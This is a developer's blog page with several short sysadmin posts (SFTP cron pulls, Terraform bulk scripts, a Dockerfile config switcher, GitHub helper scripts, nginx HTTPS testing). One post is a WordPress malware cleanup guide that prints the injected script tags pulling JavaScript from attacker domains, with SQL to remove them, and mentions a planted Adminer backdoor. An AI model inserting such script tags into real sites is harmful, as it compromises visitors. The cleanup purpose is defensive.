Authorguda

Pull remote files from sftp server

Those days we almost use cloud for everthing. But sometimes we need to pull files from sftp server. Here are two solutions for that

Pull and remove with sftp

This solution pulls the files then removes them from the remote. There is a gotcha that if you expect a lot of files there might be a chance a file to arrive while the “get -r …” command is executing. Then the “rm *” will remove it. So this is suitable if you expect a few files a week/day

Create a batchfile.sh

get -r upload/* incoming/
rm upload/*

Then add cron

0 5 * * * /usr/bin/sftp -b batchfile.sh username@sftp-corp.company.com

Only pulling with lftp

When I don’t have permissions to remove the files from the remote sftp I use the following off-the-shelf aproach.

This cron is synchronizing files all files to /home/USERNAME/incoming

0 5 * * *  /usr/bin/lftp -u USERNAME,none -e 'mirror --newer-than="now-7days" --only-newer --exclude .ssh --only-missing / /home/USERNAME/incoming; quit' sftp://sftp-corp.company.com

deploy pg gem with postgres 10

When in your distribution the postgres is stick to version 10 and you have to upgrade to postgres-11 a good way to do a capistrano deploy is like this

Do the system install with

yum install postgresql10-contrib postgresql10-devel

And then in your /shared/.bundle/config add a line showing the location of the pg libraries

---
BUNDLE_PATH: "/opt/application/shared/bundle"
BUNDLE_BUILD__PG: "--with-pg-config=/usr/pgsql-10/bin/pg_config"
BUNDLE_FROZEN: "true"
BUNDLE_JOBS: "4"
BUNDLE_WITHOUT: "development:test"

Thanks to my colleague Kris for finding the solution.

Organizing terraform modules in application stacks for free

One of the big challenges is how to organize your cloud account setup.

In one account, you can have a couple of application stacks. The challenge is to able fast to apply/plan/destroy them without any burden.

What works for me is to use one application-terraform-bulk.sh script which will know which modules to which stacks belong. And if I have a couple of modules to apply in the application stack I use terraform-bulk.sh script which just applies all modules in the current folder.

Here is an example.

Those are the ECR modules which must be presented in this account. I do not care about which stack will own them, so I will use the general terraform_bulk.sh script

The commands which I can do are:

./terraform_bulk.sh init
# ...It will go in each folder and do terraform init
./terraform_bulk.sh plan
# ...It will go in each folder and do terraform plan
./terraform_bulk.sh apply
./terraform_bulk.sh destroy

Here is how it looks the script

#!/bin/bash
trap "exit" INT

modules=(
  anaconda
  essential
  essential-anaconda-environment
)


terraform_plan() {
  local project="$1"
  pushd .
  cd $project
  terraform plan
  popd
}



terraform_init() {
  local project="$1"
  pushd .
  cd $project
  terraform init
  popd
}


terraform_apply() {
  local project="$1"
  pushd .
  cd $project
  terraform apply -auto-approve
  popd
}


terraform_destroy() {
  local project="$1"
  pushd .
  cd $project
  terraform destroy -auto-approve
  popd
}


terraform_show() {
  local project="$1"
  pushd .
  cd $project
  terraform show
  popd
}


# array=(1 2 3 4)
# reverse array foo
# echo "${foo[@]}"
reverse() {
    # first argument is the array to reverse
    # second is the output array
    declare -n arr="$1" rev="$2"
    for project in "${arr[@]}"
    do
        rev=("$project" "${rev[@]}")
    done
}





case "$1" in
  init)
      for project in "${modules[@]}"
      do
        echo ""
        echo ""
        echo $project
        terraform_init $project
      done

      ;;

  show)
      for project in "${modules[@]}"
      do
        echo ""
        echo ""
        echo $project
        terraform_show $project
      done
      ;;


  apply)
      for project in "${modules[@]}"
      do
        echo ""
        echo ""
        echo $project
        terraform_apply $project
      done
      ;;

  destroy)
      reverse modules reversed_modules
      for project in "${reversed_modules[@]}"
      do
        echo ""
        echo ""
        echo $project
        terraform_destroy $project
      done
      ;;

  plan)
      reverse modules reversed_modules
      for project in "${reversed_modules[@]}"
      do
        echo ""
        echo ""
        echo $project
        terraform_plan $project
      done
      ;;

  *)
      echo $"Usage: $0 {init|apply|destroy}"
      exit 1

esac


In my case in the development cloud account, I have to host two applications. Then I just create two versions of the script like this.

wxr-xr-x 13 guda guda 4096 Nov 15 13:20 .
drwxr-xr-x  6 guda guda 4096 Nov  5 11:20 ..
drwxr-xr-x  3 guda guda 4096 Oct 28 18:14 athena
drwxr-xr-x  3 guda guda 4096 Jul 10 15:17 cm
drwxr-xr-x  5 guda guda 4096 Dec  5 22:42 ecr
drwxr-xr-x 11 guda guda 4096 Oct 28 18:39 endpoints
-rwxr-xr-x  1 guda guda 2345 Oct 28 18:38 essential-terraform_bulk.sh <<<<<
-rwxr-xr-x  1 guda guda 2190 Oct 28 18:14 etl_monitoring-terraform_bulk.sh <<<<<
drwxr-xr-x  3 guda guda 4096 Nov  5 11:24 fargate_essential
drwxr-xr-x  3 guda guda 4096 Oct 28 18:47 rds
drwxrwxr-x  3 guda guda 4096 Sep  3 19:48 s3
drwxr-xr-x  5 guda guda 4096 Oct 28 18:47 secret_manager
drwxr-xr-x  3 guda guda 4096 Aug 15 17:02 vpc
drwxr-xr-x  4 guda guda 4096 Nov 15 13:20 vpc_peering
drwxr-xr-x  3 guda guda 4096 Aug 19 14:51 zone_security_groups

So when I want to provision:

  • essential app – use essential-terraform_bulk.sh
  • etl monitoring app – use etl_monitoring-terraform_bulk.sh

Be aware when you have to share the resources – for example vpc, you do not want the first terraform-bulk.sh to drop a resource which is needed by the second application terraform bulk.

Switch configuration lines using comments

Recently I have the case where I have to use a base Docker image from a remote or local repository. I love to keep the configuration close and to not have a couple of configuration files with the same content so I decided to write a simple program which will do the config switch and then will return it back (if needed)

Here is an example of usage:

When I build the images locally I want to use:

FROM anaconda-environment:latest

When I want to build from our CI/CD server I would like to use the remote ECR

CONFIG->remote-images:FROM XXXXXXXXXXX.dkr.ecr.us-east-1.amazonaws.com/anaconda-environment:latest

Then in the Docker file, I put those lines

# CONFIG->local-images:FROM anaconda-environment:latest
# CONFIG->remote-images:FROMXXXXXXXXXXX.dkr.ecr.us-east-1.amazonaws.com/anaconda-environment:latest
FROM anaconda-environment:latest
ENV ACCEPT_INTEL_PYTHON_EULA=yes
.... and so on...

And here is how the config is changed to point to the remote-images

ruby switch-config.rb Dockerfile remote-images

and this is how it is changed back to local images.

ruby switch.rb Dockerfile local-images

So far I haven’t found any drawback on this approach. For sure there is some drawbacks please let me know if you hit it.

And here is the code…

#!/usr/bin/env ruby

# ruby switch.rb Dockerfile remote-images
#
# # CONFIG->local-images:FROM anaconda-environment:latest
# # CONFIG->remote-images:FROM XXXXXXXXXXX.dkr.ecr.us-east-1.amazonaws.com/anaconda-environment:latest
# FROM anaconda-environment:latest




file = ARGV[0] || "Dockerfile"
desired_environment = ARGV[1] || "local"
lines = File.read(file).split("\n")
tag = /\s*?#\s+CONFIG->([\w\-]+?):(.*)\Z/
new_lines = []
key_found = true
options = {}
found_config_lines = false

lines.each do |line|
  if line =~ tag
    environment_key = $1
    option = $2
    options[environment_key] = option
    found_config_lines = true
  end

  if found_config_lines && options.values.include?(line)
    key_found = options.key?(desired_environment)
    new_lines << options[desired_environment]
    found_config_lines = false
    options = {}
  else
    new_lines << line
  end
end

if key_found
  File.write(file, new_lines.join("\n"))
else
  puts "Something is wrong - key not found! The syntax for defining options is:"
  puts "# CONFIG->KEY:The content of this option"
end

Saboteur – Rules (in Bulgarian)

Saboteur by Frederic Moyersoen

Link to the English version:

Continue reading

How to clean wordpress website

This works for infection with *.buyittraffic.com and *.gotosecond2.com

If you have an ancient WordPress 4.1.1 you and your website has become a victim of cross-site scripting here is how to clean it.

First, update your WordPress to one which is not vulnerable, such version is 4.1.28 which can be downloaded from here

In my case the victim was http://www.YOURWEBSITE.com/ and links were changed to go to http://land.buyittraffic.com

Fix the Links

Go to MySQL cli or your phpMyAdmin and recover the website URL and your home page url:

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'siteurl';

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'home';

This will fix the links on the website and administration will start to work.

At this point, you can open your website but DO NOT CLICK on any link. All posts/pages are infected.

Fix the content

To all of them have been appended nasty javascript and you have to clean them. To find the malware code which we have to delete run a curl command to see the HTML of the webpage. Copy one page/post url and check the source with “curl”

curl https://www.YOURWEBSITE.com/page?id=123

You will see something like this at the end

<script src='https://js.greenlabelfrancisco.com/clizkes' type='text/javascript'></script>
<script src='https://dl.gotosecond2.com/clizkes' type='text/javascript'></script>

Then run those commands in the mysql console:


UPDATE wp_posts 
  SET post_content = REPLACE(post_content,
      "<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://land.buyittraffic.com/clizkes' type='text/javascript'></script>",
      '');


Check to see if you have nasty code with

curl http://www.YOURWEBSITE.com/

If you don’t see the malware then it is safe to open in the browser again.

Check for Adminer

Check to see if your site contain remote administration php

grep -lri Adminer wordpress/

In my case the file was named ad.php

Delete it!

Happy 2020!

Script to open a pull request on github from the current branch

When you push a new branch to GitHub from the command line, you’ll notice a URL within the output which you can copy in order to quickly open a new pull request.

But if you are on old branch…then nothing will help you.

And I was tired opening the github website so…. here it is a small ruby script which opens my browser at the correct place in github.

 

#!/usr/bin/env ruby
output = `git branch`
selected_branch = output.split("\n").find{|element| element =~ /^\*/}
current_branch = selected_branch.split(' ').last

remote = `git remote -v`.split("\n").find{|element| element =~ /origin\s.*?push\)$/}.split(' ')[1]

githost = remote.gsub('git@', '').gsub(/.git$/, '').gsub(/^github.com:/, 'github.com/')


`chromium-browser https://#{githost}/compare/#{current_branch}?expand=1`

This version supports sub-modules

 

Bonus; Script to open the current github repo in browser

#!/usr/bin/env ruby
output = `git branch`
selected_branch = output.split("\n").find{|element| element =~ /^\*/}
current_branch = selected_branch.split(' ').last

remote = `git remote -v`.split("\n").find{|element| element =~ /origin\s.*?push\)$/}.split(' ')[1]

githost = remote.gsub('git@', '').gsub(/.git$/, '').gsub(/^github.com:/, 'github.com/')


`chromium-browser https://#{githost}/`

 

Great notes on development

https://blog.juliobiason.net/thoughts/things-i-learnt-the-hard-way/

The meaning of “phlpwcspweb3” or why you should not do abbreviations in the code

“phlpwcspweb3”  is found at the “Amazon Web Services – Tagging Best Practices

From what I see this is something related to web, and probably there are at least 3 instances of that kind.

According to AWS this should be meaningful hostname.

If you have decoded this you probably do not need to read further….

Continue reading

HTTPS Connections counting

Here is how one can setup a nginx to count the https connections made.

Preparation

Create a new folder

mkdir ~/docker_ssl_proxy
cd ~/docker_ssl_proxy

Put a dummy entry in your /etc/hosts file

127.0.0.1 YOURDOMAIN.com

Steps

First generate certificate

openssl req -subj '/CN=YOURDOMAIN.com' -x509 -newkey rsa:4096 -nodes -keyout key.pem -out cert.pem -days 365

create a new file something.conf with the following content

server {
  listen 4000 ssl;
  ssl_certificate /etc/nginx/conf.d/cert.pem;
  ssl_certificate_key /etc/nginx/conf.d/key.pem;

  # access_log /dev/stdout;
  access_log  /var/log/nginx/access.log;
  error_log /var/log/nginx/error.log;

  location / {
      return 200 'With style!';
      add_header Content-Type text/plain;
  }


}

Then run the docker with

docker run --rm -v `pwd`/logs:/var/log/nginx -v `pwd`:/etc/nginx/conf.d -p 4000:4000 nginx

Get the cacert

echo quit | openssl s_client -showcerts -servername server -connect YOURDOMAIN.com:4000 > cacert.pem
curl --cacert cacert.pem https://YOURDOMAIN.com:4000/ -d 'hello world'

And finally do some connections

go-wrk  -c=400 -t=8 -n=10000 -m="POST" -b='{"accountID":"1"}'  -i https://YOURDOMAIN.com:4000

 

© 2020 Gudasoft

Theme by Anders NorénUp ↑